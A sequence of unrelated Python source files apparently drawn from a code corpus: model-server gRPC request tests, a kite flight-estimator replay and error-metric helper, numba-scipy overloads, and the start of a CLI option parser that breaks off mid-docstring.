def test_quantile_filtering_two_sided_asym():
exp = Experiment({})
data = list(range(-8,0)) + list(range(16))
df = pd.DataFrame.from_dict({'earnings' : data})
flags = exp._quantile_filtering(df, ['earnings'],
{'earnings': ('two-sided-asym', 50.0)})
results = flags.tolist()
assert results == [True]*2 + [False]*18 + [True]*4
|
moya/template/__init__.py | moyaproject/moya | 129 | 12685075 | <gh_stars>100-1000
from __future__ import absolute_import
from .enginebase import TemplateEngine
from .moyatemplates import Template
from .environment import Environment
TemplateEngine
Template
Environment
|
client/python/lib/tests/test_grpc_requests.py | Xaenalt/model_server | 234 | 12685099 | #
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from tensorflow.core.framework.tensor_pb2 import TensorProto
from tensorflow_serving.apis.get_model_metadata_pb2 import GetModelMetadataRequest
from tensorflow_serving.apis.get_model_status_pb2 import GetModelStatusRequest
from ovmsclient.tfs_compat.grpc.requests import (GrpcModelMetadataRequest, GrpcPredictRequest,
_check_model_spec, make_metadata_request,
make_predict_request, make_status_request,
GrpcModelStatusRequest)
from config import (MODEL_SPEC_INVALID, MODEL_SPEC_VALID,
PREDICT_REQUEST_INVALID_INPUTS, PREDICT_REQUEST_VALID)
from tensorflow_serving.apis.predict_pb2 import PredictRequest
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_check_model_spec_valid(name, version):
_check_model_spec(name, version)
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_check_model_spec_invalid(name, version, expected_exception, expected_message):
with pytest.raises(expected_exception) as e_info:
_check_model_spec(name, version)
assert str(e_info.value) == expected_message
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_make_status_request_valid(mocker, name, version):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
model_status_request = make_status_request(name, version)
mock_method.assert_called_once()
assert isinstance(model_status_request, GrpcModelStatusRequest)
assert model_status_request.model_version == version
assert model_status_request.model_name == name
assert isinstance(model_status_request.raw_request, GetModelStatusRequest)
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_status_request_invalid(mocker, name, version, expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_status_request(name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.parametrize("name, version", MODEL_SPEC_VALID)
def test_make_metadata_request_vaild(mocker, name, version):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
model_metadata_request = make_metadata_request(name, version)
mock_method.assert_called_once()
assert isinstance(model_metadata_request, GrpcModelMetadataRequest)
assert model_metadata_request.model_version == version
assert model_metadata_request.model_name == name
assert isinstance(model_metadata_request.raw_request, GetModelMetadataRequest)
assert len(model_metadata_request.raw_request.metadata_field) == 1
assert model_metadata_request.raw_request.metadata_field[0] == 'signature_def'
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_metadata_request_invalid(mocker, name, version, expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_metadata_request(name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.parametrize("inputs, expected_proto, name, version", PREDICT_REQUEST_VALID)
def test_make_predict_request_valid(inputs, expected_proto, name, version):
model_predict_request = make_predict_request(inputs, name, version)
raw_predict_request = model_predict_request.raw_request
assert isinstance(model_predict_request, GrpcPredictRequest)
assert model_predict_request.model_name == name
assert model_predict_request.model_version == version
assert model_predict_request.inputs == inputs
assert isinstance(raw_predict_request, PredictRequest)
assert raw_predict_request.model_spec.name == name
assert raw_predict_request.model_spec.version.value == version
assert len(inputs.keys()) == len(list(raw_predict_request.inputs.keys()))
for key, value in inputs.items():
assert isinstance(raw_predict_request.inputs[key], TensorProto)
if isinstance(value, TensorProto):
assert value == raw_predict_request.inputs[key]
else:
assert (raw_predict_request.inputs[key].__getattribute__(expected_proto[key]['field'])
== expected_proto[key]['value'])
assert raw_predict_request.inputs[key].tensor_shape == expected_proto[key]['shape']
assert raw_predict_request.inputs[key].dtype == expected_proto[key]['dtype']
@pytest.mark.parametrize("name, version, expected_exception, expected_message", MODEL_SPEC_INVALID)
def test_make_predict_request_invalid_model_spec(mocker, name, version,
expected_exception, expected_message):
inputs = {
"input": [1, 2, 3]
}
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec',
side_effect=expected_exception(expected_message))
with pytest.raises(expected_exception) as e_info:
make_predict_request(inputs, name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
@pytest.mark.causes_deprecation_warning
@pytest.mark.parametrize("""inputs, name, version,
expected_exception, expected_message""", PREDICT_REQUEST_INVALID_INPUTS)
def test_make_predict_request_invalid_inputs(mocker, inputs, name, version,
expected_exception, expected_message):
mock_method = mocker.patch('ovmsclient.tfs_compat.grpc.requests._check_model_spec')
with pytest.raises(expected_exception) as e_info:
make_predict_request(inputs, name, version)
assert str(e_info.value) == expected_message
mock_method.assert_called_once()
|
analysis/control/replay/estimator_helper.py | leozz37/makani | 1,178 | 12685103 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module abstracts the ctypes EstimatorReplay interface for python."""
import copy
import ctypes
import re
import sys
import gflags
from makani.analysis.control.replay import estimator_replay as replay
from makani.control import control_types
import numpy as np
import scipy.io as sio
def LoadMessages(filename,
path='/messages/kAioNodeControllerA/kMessageTypeControlDebug',
flight=None):
"""Load ControlTelemetry messages for reprocessing the estimator.
Args:
filename: A string describing the full path to the HDF5 kite log file.
path: A string describing the HDF5 message path.
flight: A string describing the flight name (e.g., rpx02) or None.
Returns:
A ctypes array of ControlTelemetry messages.
"""
num_messages = replay.H5GetNumMessages(filename, path)
messages = (replay.ControlTelemetry * num_messages)()
replay.H5GetControlTelemetryMessages(filename, path, flight, num_messages,
messages)
return messages
class Estimator(object):
"""Python interface to EstimatorReplay."""
def __init__(self, name=None):
self.name = name
self._params = copy.deepcopy(replay.GetControlParams().contents.estimator)
self._fault_subsystems = set()
self._outputs = []
self.Reset()
def _SetParamByPath(self, params, path, value):
p = path.split('.', 1)
if len(p) == 1 and hasattr(params, p[0]):
setattr(params, p[0], value)
elif len(p) > 1 and hasattr(params, p[0]):
self._SetParamByPath(getattr(params, p[0]), p[1], value)
else:
raise ValueError('Invalid parameter path: ' + path)
def UpdateParam(self, path, value):
"""Update a parameter in EstimatorParams.
Args:
path: A string describing the dot path to the parameter.
value: A numerical value to assign.
"""
self._SetParamByPath(self._params, path, value)
def UpdateParams(self, params):
"""Update multiple parameters in EstimatorParams.
Args:
params: A dict mapping the parameter dot path to the assignment value.
"""
for k, v in params.iteritems():
self.UpdateParam(k, v)
def SaturateIndices(self, messages, first_index=0, last_index=None):
"""Ensure message indices are within the bounds of the messages array.
Args:
messages: A ctypes array of ControlTelemetry messages.
first_index: An integer describing the first index in the messages array.
last_index: An integer describing the last index in the messages array.
Returns:
Tuple (first_index, last_index), where first_index and last_index are on
interval [0, num_messages - 1].
"""
num_messages = len(messages)
if last_index is None:
last_index = num_messages - 1
first_index = max(0, min(first_index, num_messages - 1))
last_index = max(0, min(last_index, num_messages - 1))
return first_index, last_index
def Reset(self):
"""Reinitialize the estimator."""
self._outputs = []
self.ResetState(replay.FlightMode(), replay.EstimatorState())
replay.EstimatorReplayInit(ctypes.byref(self._params),
ctypes.byref(self._flight_mode),
ctypes.byref(self._state))
def ResetState(self, flight_mode, state):
"""Reset the estimator state.
Args:
flight_mode: A ctypes FlightMode enum value.
state: A ctypes EstimatorState structure.
"""
self._flight_mode = copy.deepcopy(flight_mode)
self._state = copy.deepcopy(state)
def ResetMessages(self, original, first_index, last_index, messages):
"""Reset the fault state of messages on interval [first_index, last_index].
Args:
original: A ctypes array of unmodified ControlTelemetry messages.
first_index: An integer describing the first index in the messages array.
last_index: An integer describing the last index in the messages array.
messages: A ctypes array of modified ControlTelemetry messages. This
function updates interval [first_index, last_index].
"""
first_index, last_index = self.SaturateIndices(original, first_index,
last_index)
# Reset all faults in all subsystems back to their original value.
subsystems = range(control_types.kNumSubsystems)
labels = self._GetSubsystemLabelsArray(subsystems)
replay.ClearControlTelemetryFaults(first_index, last_index, original,
len(labels), labels, 0xFFFFFFFF,
messages)
# Set all possible faults in selected subsystems.
set_fault_mask = 0xFFFFFFFF
labels = self._GetSubsystemLabelsArray(self._fault_subsystems)
replay.SetControlTelemetryFaults(first_index, last_index, len(labels),
labels, set_fault_mask, messages)
def _SubsystemsParameterToSet(self, subsystems):
"""Convert subsystems parameters to a set."""
if not isinstance(subsystems, (set, list)):
subsystems = [subsystems]
return set(subsystems)
def _GetSubsystemLabelsArray(self, subsystems):
"""Translate a list of subsystems to a ctypes SubsystemLabel array."""
subsystems = self._SubsystemsParameterToSet(subsystems)
labels = (replay.SubsystemLabel * len(subsystems))()
for i, subsys in enumerate(subsystems):
labels[i] = subsys
return labels
def ClearFaults(self, subsystems):
"""Clear faults for a list of subsystems."""
subsystems = self._SubsystemsParameterToSet(subsystems)
self._fault_subsystems -= subsystems
def ClearAllFaults(self):
"""Clear all faults."""
self.ClearFaults(range(control_types.kNumSubsystems))
def SetFaults(self, subsystems):
"""Set faults for a list of subsystems."""
subsystems = self._SubsystemsParameterToSet(subsystems)
self._fault_subsystems |= subsystems
def SetAllFaults(self):
"""Set faults in all controller subsystems."""
self.SetFaults(range(control_types.kNumSubsystems))
def ClearImuAccelGyroFaults(self):
"""Clear IMU accelerometer and gyro subsystem faults."""
subsystems = [control_types.kSubsysImuAAcc,
control_types.kSubsysImuAGyro,
control_types.kSubsysImuBAcc,
control_types.kSubsysImuBGyro,
control_types.kSubsysImuCAcc,
control_types.kSubsysImuCGyro]
self.ClearFaults(subsystems)
def SetGpsCrosswindFaults(self):
"""Set faults in the GPS subsystem for the crosswind antenna."""
subsystems = [control_types.kSubsysWingGpsCrosswindPos,
control_types.kSubsysWingGpsCrosswindVel]
self.SetFaults(subsystems)
def SetGpsHoverFaults(self):
"""Set faults in the GPS subsystem for the hover antenna."""
subsystems = [control_types.kSubsysWingGpsHoverPos,
control_types.kSubsysWingGpsHoverVel]
self.SetFaults(subsystems)
def SetGpsPortFaults(self):
"""Set faults in the GPS subsystem for the port wingtip antenna."""
subsystems = [control_types.kSubsysWingGpsPortPos,
control_types.kSubsysWingGpsPortVel]
self.SetFaults(subsystems)
def SetGpsStarboardFaults(self):
"""Set faults in the GPS subsystem for the starboard wingtip antenna."""
subsystems = [control_types.kSubsysWingGpsStarPos,
control_types.kSubsysWingGpsStarVel]
self.SetFaults(subsystems)
def SetGpsFaults(self):
"""Set faults in all wing GPS subsystems."""
self.SetGpsCrosswindFaults()
self.SetGpsHoverFaults()
self.SetGpsPortFaults()
self.SetGpsStarboardFaults()
def SetGsGpsFaults(self):
"""Set faults in the ground station GPS subsystem."""
subsystems = [control_types.kSubsysGsCompass,
control_types.kSubsysGsGpsPos,
control_types.kSubsysGsGpsVel]
self.SetFaults(subsystems)
def SetGsgFaults(self):
"""Set faults in the ground side gimble subsystems."""
subsystems = [control_types.kSubsysGsgAAzi,
control_types.kSubsysGsgAEle,
control_types.kSubsysGsgBAzi,
control_types.kSubsysGsgBEle]
self.SetFaults(subsystems)
def SetGlasFaults(self):
"""Set faults in the ground line angle sensing subsystems."""
self.SetGsgFaults()
self.SetLevelwindFaults()
self.SetLoadcellFaults()
self.SetPerchAziFaults()
def SetLevelwindFaults(self):
"""Set faults in the levelwind subsystems."""
subsystems = [control_types.kSubsysLevelwindEleA,
control_types.kSubsysLevelwindEleB]
self.SetFaults(subsystems)
def SetLoadcellFaults(self):
"""Set faults in the loadcell subsystems."""
subsystems = [control_types.kSubsysLoadcellSensorPort0,
control_types.kSubsysLoadcellSensorPort1,
control_types.kSubsysLoadcellSensorStarboard0,
control_types.kSubsysLoadcellSensorStarboard1]
self.SetFaults(subsystems)
def SetMagFaults(self):
"""Set faults in the magnetometer subsystems."""
subsystems = [control_types.kSubsysImuAMag,
control_types.kSubsysImuBMag,
control_types.kSubsysImuCMag]
self.SetFaults(subsystems)
def SetPerchAziFaults(self):
"""Set faults in the perch azimuth subsystems."""
subsystems = [control_types.kSubsysPerchAziA,
control_types.kSubsysPerchAziB]
self.SetFaults(subsystems)
def SetPitotFaults(self):
"""Set faults in the pitot tube subsystems."""
subsystems = [control_types.kSubsysPitotSensorHighSpeedAlpha,
control_types.kSubsysPitotSensorHighSpeedBeta,
control_types.kSubsysPitotSensorHighSpeedDynamic,
control_types.kSubsysPitotSensorHighSpeedStatic,
control_types.kSubsysPitotSensorLowSpeedAlpha,
control_types.kSubsysPitotSensorLowSpeedBeta,
control_types.kSubsysPitotSensorLowSpeedDynamic,
control_types.kSubsysPitotSensorLowSpeedStatic]
self.SetFaults(subsystems)
def SetWeatherFaults(self):
"""Set faults in the weather subsystems."""
subsystems = [control_types.kSubsysWeather]
self.SetFaults(subsystems)
def SetWindFaults(self):
"""Set faults in the wind subsystems."""
subsystems = [control_types.kSubsysWindSensor]
self.SetFaults(subsystems)
def Iterate(self, messages, first_index, last_index, states, estimates):
"""Iterate the state estimate from first_index to last_index.
Args:
messages: A ctypes array of ControlTelemetry messages to process.
first_index: An integer describing the first index to process.
last_index: An integer describing the last index to process.
states: A ctypes array of EstimatorStates output states, equal in length
to the messages array.
estimates: A ctypes array of StateEstimate output estimates, equal in
length to the messages array.
"""
assert first_index <= last_index
first_index, last_index = self.SaturateIndices(messages, first_index,
last_index)
replay.EstimatorReplayIterateArray(ctypes.byref(self._params),
first_index, last_index, messages,
ctypes.byref(self._flight_mode),
ctypes.byref(self._state), states,
estimates)
def IterateSegment(self, flight_mode_z1, state_z1, first_index, last_index,
messages, modified_messages, states, estimates):
self.ResetState(flight_mode_z1, state_z1)
self.ResetMessages(messages, first_index, last_index, modified_messages)
self.Iterate(modified_messages, first_index, last_index, states, estimates)
def ComputeOutputs(self, messages, first_index, last_index, states,
estimates):
"""Compute estimator outputs from first_index to last_index.
Note that this function also stores the outputs in an array for each
interval. Use property 'output' to access this array.
Args:
messages: A ctypes array of ControlTelemetry messages to process.
first_index: An integer describing the first index to process.
last_index: An integer describing the last index to process.
states: A ctypes array of EstimatorStates output states, equal in length
to the messages array.
estimates: A ctypes array of StateEstimate output estimates, equal in
length to the messages array.
Returns:
An EstimatorOutput object.
"""
output = EstimatorOutput(self.initializing, messages, states, estimates,
first_index, last_index)
self._outputs.append(output)
return output
def ComputeErrorMetrics(self, references):
return [ErrorMetrics(o, r) for o, r in zip(self._outputs, references)]
@property
def params(self):
return self._params
@property
def flight_mode(self):
return copy.deepcopy(self._flight_mode)
@property
def state(self):
return copy.deepcopy(self._state)
@property
def initializing(self):
return replay.GetEstimatorTelemetry().contents.initializing
@property
def outputs(self):
return self._outputs
@property
def output_interval(self):
return max([o.segment_time for o in self._outputs])
class EstimatorMetrics(object):
"""Base class to store estimator outputs over a given interval."""
def __init__(self, messages, first_index, last_index):
self._first_index = first_index
self._last_index = last_index
self._indices = range(first_index, last_index + 1)
self._num_messages = last_index - first_index + 1
self._valid = np.zeros(self._num_messages, dtype=bool)
self._time = np.array([messages[i].time for i in self._indices])
self._position = np.zeros((self._num_messages, 3))
self._velocity = np.zeros((self._num_messages, 3))
self._attitude = np.zeros((self._num_messages, 3, 3))
self._gyro_bias = np.zeros((self._num_messages, 3))
self._flight_modes = np.unique([messages[i].flight_mode
for i in self._indices])
def SetValid(self, valid):
if isinstance(valid, bool):
self._valid = valid * np.ones(self._num_messages, dtype=bool)
else:
self._valid = valid
def SetPosition(self, position):
self._position = position
def SetVelocity(self, velocity):
self._velocity = velocity
def SetAttitude(self, attitude):
self._attitude = attitude
def SetGyroBias(self, gyro_bias):
self._gyro_bias = gyro_bias
@property
def first_index(self):
return self._first_index
@property
def last_index(self):
return self._last_index
@property
def indices(self):
return self._indices
@property
def num_messages(self):
return self._num_messages
@property
def segment_time(self):
return self._num_messages * replay.GetSystemParams().contents.ts
@property
def valid(self):
return self._valid
@property
def position(self):
return self._position
@property
def velocity(self):
return self._velocity
@property
def attitude(self):
return self._attitude
@property
def gyro_bias(self):
return self._gyro_bias
@property
def time(self):
return self._time
@property
def flight_modes(self):
return self._flight_modes
class EstimatorOutput(EstimatorMetrics):
"""Store the estimator outputs."""
def __init__(self, initializing, messages, states, estimates, first_index,
last_index):
super(EstimatorOutput, self).__init__(messages, first_index, last_index)
self.SetPosition(self.ExtractPositionEstimate(estimates))
self.SetVelocity(self.ExtractVelocityEstimate(estimates))
self.SetAttitude(self.ExtractAttitudeEstimate(estimates))
self.SetGyroBias(self.ExtractGyroBiasEstimate(states))
self.SetValid(not initializing)
def ExtractPositionEstimate(self, estimates):
"""Extract the estimator position estimates."""
position = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
position[i, 0] = estimates[m].Xg.x
position[i, 1] = estimates[m].Xg.y
position[i, 2] = estimates[m].Xg.z
return position
def ExtractVelocityEstimate(self, estimates):
"""Extract the estimator velocity estimates."""
velocity = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
velocity[i, 0] = estimates[m].Vg.x
velocity[i, 1] = estimates[m].Vg.y
velocity[i, 2] = estimates[m].Vg.z
return velocity
def ExtractAttitudeEstimate(self, estimates):
"""Extract the estimator attitude estimates."""
attitude = np.zeros((self.num_messages, 3, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
for j in range(3):
for k in range(3):
attitude[i, j, k] = estimates[m].dcm_g2b.d[j][k]
return attitude
def ExtractGyroBiasEstimate(self, states):
"""Extract the estimator gyro bias estimates."""
gyro_bias = np.zeros((self.num_messages, 3))
for i in xrange(self.num_messages):
m = self.first_index + i
imu = states[m].nav.last_used_imu
gyro_bias[i, 0] = states[m].nav.attitude[imu].filter.gyro_bias.x
gyro_bias[i, 1] = states[m].nav.attitude[imu].filter.gyro_bias.y
gyro_bias[i, 2] = states[m].nav.attitude[imu].filter.gyro_bias.z
return gyro_bias
class ErrorMetrics(object):
"""Compute error between two EstimatorMetrics objects."""
def __init__(self, a, b):
"""Instantiate an ErrorMetrics object.
Args:
a: An EstimatorMetrics object.
b: An EstimatorMetrics object.
"""
assert a.first_index == b.first_index
assert a.last_index == b.last_index
# Compute error over valid trajectory indices.
ii = np.where(a.valid)[0]
ii = ii[b.valid[ii]]
# Compute position error.
self._position_error = np.linalg.norm(a.position[ii] - b.position[ii],
axis=1)
# Compute velocity error.
self._velocity_error = np.linalg.norm(a.velocity[ii] - b.velocity[ii],
axis=1)
# Compute attitude error as the norm of the small angle rotation vector.
attitude_error = np.zeros((len(a.attitude), 3))
for i in ii:
dcm_a = np.matrix(a.attitude[i])
dcm_b = np.matrix(b.attitude[i])
delta = dcm_b.transpose() * dcm_a
attitude_error[i, 0] = -delta[1, 2]
attitude_error[i, 1] = delta[0, 2]
attitude_error[i, 2] = -delta[0, 1]
self._attitude_error = np.linalg.norm(attitude_error[ii], axis=1)
# Compute gyro bias error.
self._gyro_bias_error = np.linalg.norm(a.gyro_bias[ii] - b.gyro_bias[ii],
axis=1)
# Store time and flight modes. These quantities should be common.
self._time = a.time[ii]
self._flight_modes = a.flight_modes
@property
def flight_modes(self):
return self._flight_modes
@property
def time(self):
return self._time
@property
def position_error(self):
return self._position_error
@property
def position_mae(self):
return np.sum(np.abs(self._position_error)) / len(self._position_error)
@property
def position_maxe(self):
return np.max(self._position_error)
@property
def position_rmse(self):
return np.std(self._position_error)
@property
def velocity_error(self):
return self._velocity_error
@property
def velocity_mae(self):
return np.sum(np.abs(self._velocity_error)) / len(self._velocity_error)
@property
def velocity_maxe(self):
return np.max(self._velocity_error)
@property
def velocity_rmse(self):
return np.std(self._velocity_error)
@property
def attitude_error(self):
return self._attitude_error
@property
def attitude_mae(self):
return np.sum(np.abs(self._attitude_error)) / len(self._attitude_error)
@property
def attitude_maxe(self):
return np.max(self._attitude_error)
@property
def attitude_rmse(self):
return np.std(self._attitude_error)
@property
def gyro_bias_error(self):
return self._gyro_bias_error
@property
def gyro_bias_mae(self):
return np.sum(np.abs(self._gyro_bias_error)) / len(self._gyro_bias_error)
@property
def gyro_bias_maxe(self):
return np.max(self._gyro_bias_error)
@property
def gyro_bias_rmse(self):
return np.std(self._gyro_bias_error)
def ComputeCdf(error_metrics, attribute):
x = np.sort(np.array([getattr(e, attribute) for e in error_metrics
if len(e.time)]))
y = np.linspace(0.0, 1.0, len(x))
return x, y
def ComputeEstimatorErrorCdfs(ref_estimator, test_estimators, t0=-float('inf'),
t1=float('inf')):
"""Compute error CDFs by comparing each test estimator against the reference.
Args:
ref_estimator: An Estimator object.
test_estimators: A list of Estimator objects.
t0: A float describing the minimum time to consider.
t1: A float describing the maximum time to consider.
Returns:
A dict that maps the test estimator name to its error metric CDFs.
"""
output = {}
for est in test_estimators:
error_metrics = est.ComputeErrorMetrics(ref_estimator.outputs)
error_metrics = [o for o in error_metrics
if o.time.size > 0 and t0 <= np.min(o.time)
and np.max(o.time) <= t1]
pos_maxe, prob = ComputeCdf(error_metrics, 'position_maxe')
pos_mae, _ = ComputeCdf(error_metrics, 'position_mae')
pos_rmse, _ = ComputeCdf(error_metrics, 'position_rmse')
vel_maxe, _ = ComputeCdf(error_metrics, 'velocity_maxe')
vel_mae, _ = ComputeCdf(error_metrics, 'velocity_mae')
vel_rmse, _ = ComputeCdf(error_metrics, 'velocity_rmse')
att_maxe, _ = ComputeCdf(error_metrics, 'attitude_maxe')
att_mae, _ = ComputeCdf(error_metrics, 'attitude_mae')
att_rmse, _ = ComputeCdf(error_metrics, 'attitude_rmse')
bg_maxe, _ = ComputeCdf(error_metrics, 'gyro_bias_maxe')
bg_mae, _ = ComputeCdf(error_metrics, 'gyro_bias_mae')
bg_rmse, _ = ComputeCdf(error_metrics, 'gyro_bias_rmse')
output[est.name] = {
'name': est.name,
'prob': prob,
'pos_maxe': pos_maxe,
'pos_mae': pos_mae,
'pos_rmse': pos_rmse,
'vel_maxe': vel_maxe,
'vel_mae': vel_mae,
'vel_rmse': vel_rmse,
'att_maxe': att_maxe,
'att_mae': att_mae,
'att_rmse': att_rmse,
'bg_maxe': bg_maxe,
'bg_mae': bg_mae,
'bg_rmse': bg_rmse,
}
return output
def SaveEstimatorErrorCdfsToMatFile(output, filename):
# Replace invalid variable name characters with an underscore.
mat = {re.sub(r'[^(A-Za-z0-9_)]', r'_', k): v for k, v in output.iteritems()}
sio.savemat(filename, mat)
def ProcessEstimatorSegments(messages, increment, seg_length, ref_estimator,
test_estimators):
"""Periodically process test estimator segments from the reference estimator.
This function helps understand the relative performance between two or more
estimator configurations. It iterates the reference estimator forward in steps
of 'increment' messages. At each increment, it iterates all estimators for
'seg_length' messages from the current reference estimator state. Each
estimator then stores its output trajectory within its own object structure.
Args:
messages: A ctypes array of ControlTelemetry messages.
increment: An integer number of messages to iterate between each segment.
seg_length: An integer number of messages to iterate for each segment.
ref_estimator: An Estimator object.
test_estimators: A list of Estimator objects.
"""
assert increment > 0
assert seg_length > 0
# Allocate memory.
num_messages = len(messages)
states = (replay.EstimatorState * num_messages)()
estimates = (replay.StateEstimate * num_messages)()
modified_messages = copy.deepcopy(messages)
num_segments = (num_messages + increment - 1) / increment
# Set initial state and clear previous outputs.
ref_estimator.Reset()
for est in test_estimators:
est.Reset()
first_index_z1 = 0
flight_mode_z1 = ref_estimator.flight_mode
state_z1 = ref_estimator.state
# Iterate for each increment.
for segment in range(num_segments):
first_index = segment * increment
last_index = min(segment * increment + seg_length, num_messages) - 1
# Advance reference estimator to the segment start.
if first_index_z1 < first_index - 1:
ref_estimator.IterateSegment(flight_mode_z1, state_z1, first_index_z1,
first_index - 1, messages, modified_messages,
states, estimates)
first_index_z1 = first_index
flight_mode_z1 = ref_estimator.flight_mode
state_z1 = ref_estimator.state
# Iterate reference estimator over the current segment.
ref_estimator.IterateSegment(flight_mode_z1, state_z1, first_index,
last_index, messages, modified_messages,
states, estimates)
ref_estimator.ComputeOutputs(modified_messages, first_index, last_index,
states, estimates)
# Iterate test configurations over the current segment.
for est in test_estimators:
est.IterateSegment(flight_mode_z1, state_z1, first_index, last_index,
messages, modified_messages, states, estimates)
est.ComputeOutputs(modified_messages, first_index, last_index, states,
estimates)
def CreatePureInertialScenario(ref_estimator, name='Pure inertial'):
est = copy.deepcopy(ref_estimator)
est.name = name
est.SetAllFaults()
est.ClearImuAccelGyroFaults()
return est
def CreateGpsDropoutScenario(ref_estimator, name='Full GPS dropout'):
est = copy.deepcopy(ref_estimator)
est.name = name
est.SetGpsFaults()
return est
def main(argv):
"""Implement a simple demo for computing error CDFs."""
# Input/output flags.
gflags.DEFINE_string('input_file', None, 'Full path to wing HDF5 log file.')
gflags.MarkFlagAsRequired('input_file')
gflags.DEFINE_string('output_file', None, 'Full path to output MAT file.')
gflags.MarkFlagAsRequired('output_file')
# Segment processing flags.
gflags.DEFINE_integer('increment', 100,
'Integer number of messages between segments.')
gflags.DEFINE_integer('seg_length', 1000,
'Integer number of messages in each segment.')
# Evaluate segments over a specific time interval.
gflags.DEFINE_float('start_time', -float('inf'),
'Start time to evaluate segment errors.')
gflags.DEFINE_float('end_time', float('inf'),
'End time to evaluate segment errors.')
# Override default parameters.
gflags.DEFINE_list('params', [],
'A comma-separated list of param=value tokens, where '
'each param describes the dot path to a parameter in '
'EstimatorParams.')
gflags.RegisterValidator('params',
lambda l: all(len(s.split('=')) == 2 for s in l),
message='Invalid key=value parameter syntax.')
# Scenarios to process.
gflags.DEFINE_bool('scenario_pure_inertial', False,
'Process pure inertial scenario.')
gflags.DEFINE_bool('scenario_gps_dropout', False,
'Process GPS dropout scenario.')
# Common faults to introduce.
gflags.DEFINE_bool('fault_weather', False,
'Fault weather subsystems to avoid an assert when '
'reprocessing historical data.')
gflags.DEFINE_bool('fault_glas', False, 'Fault GLAS subsystems.')
# Specify flight for special handling.
gflags.DEFINE_string('flight', None,
'Fix known issues associated with the given flight.')
try:
argv = gflags.FLAGS(argv)
except gflags.FlagsError, e:
print '{}\nUsage: {} ARGS\n{}'.format(e, sys.argv[0], gflags.FLAGS)
sys.exit(1)
flags = gflags.FLAGS
ref_estimator = Estimator('Reference')
if flags.fault_glas:
ref_estimator.SetGlasFaults()
if flags.fault_weather:
ref_estimator.SetWeatherFaults()
for param_value in flags.params:
param, value = param_value.split('=', 1)
ref_estimator.UpdateParam(param, float(value))
test_estimators = []
if flags.scenario_pure_inertial:
test_estimators.append(CreatePureInertialScenario(ref_estimator))
if flags.scenario_gps_dropout:
test_estimators.append(CreateGpsDropoutScenario(ref_estimator))
messages = LoadMessages(flags.input_file, flight=flags.flight)
ProcessEstimatorSegments(messages, flags.increment, flags.seg_length,
ref_estimator, test_estimators)
output = ComputeEstimatorErrorCdfs(ref_estimator, test_estimators,
t0=flags.start_time, t1=flags.end_time)
SaveEstimatorErrorCdfsToMatFile(output, flags.output_file)
if __name__ == '__main__':
main(sys.argv)
|
numba_scipy/special/overloads.py | heroxbd/numba-scipy | 161 | 12685107 | import numba
import scipy.special as sc
from . import signatures
def choose_kernel(name, all_signatures):
def choice_function(*args):
for signature in all_signatures:
if args == signature:
f = signatures.name_and_types_to_pointer[(name, *signature)]
return lambda *args: f(*args)
return choice_function
def add_overloads():
for name, all_signatures in signatures.name_to_numba_signatures.items():
sc_function = getattr(sc, name)
numba.extending.overload(sc_function)(
choose_kernel(name, all_signatures)
)
|
jasmin/protocols/cli/options.py | 2naive/jasmin | 750 | 12685109 | <gh_stars>100-1000
"""Variant of cmd2's option parsing mechanism (http://www.assembla.com/wiki/show/python-cmd2)
"""
import re
import pyparsing
import optparse
class OptionParser(optparse.OptionParser):
def __init__(self, option_class=optparse.Option):
optparse.OptionParser.__init__(self, add_help_option=False, option_class=option_class)
def error(self, msg):
"""error(msg : string)
Print a usage message incorporating 'msg' to stderr and exit.
If you override this in a subclass, it should not return -- it
should either exit or raise an exception.
"""
raise optparse.OptParseError(msg)
def remaining_args(oldArgs, newArgList):
"""
Preserves the spacing originally in the argument after
the removal of options.
>>> remaining_args('-f bar bar cow', ['bar', 'cow'])
'bar cow'
"""
pattern = r'\s+'.join(re.escape(a) for a in newArgList) + r'\s*$'
matchObj = re.search(pattern, oldArgs)
return oldArgs[matchObj.start():]
def _attr_get_(obj, attr):
"""Returns an attribute's value, or None (no error) if undefined.
Analagous to .get() for dictionaries. Useful when checking for
value of options that may not have been defined on a given
method."""
try:
return getattr(obj, attr)
except AttributeError:
return None
optparse.Values.get = _attr_get_
options_defined = [] # used to distinguish --options from SQL-style --comments
def options(option_list, arg_desc="arg"):
"""Used as a decorator and passed a list of optparse-style options,
alters a method to populate its ``opts`` argument from its
raw text argument.
Example: transform
def do_something(self, arg):
into
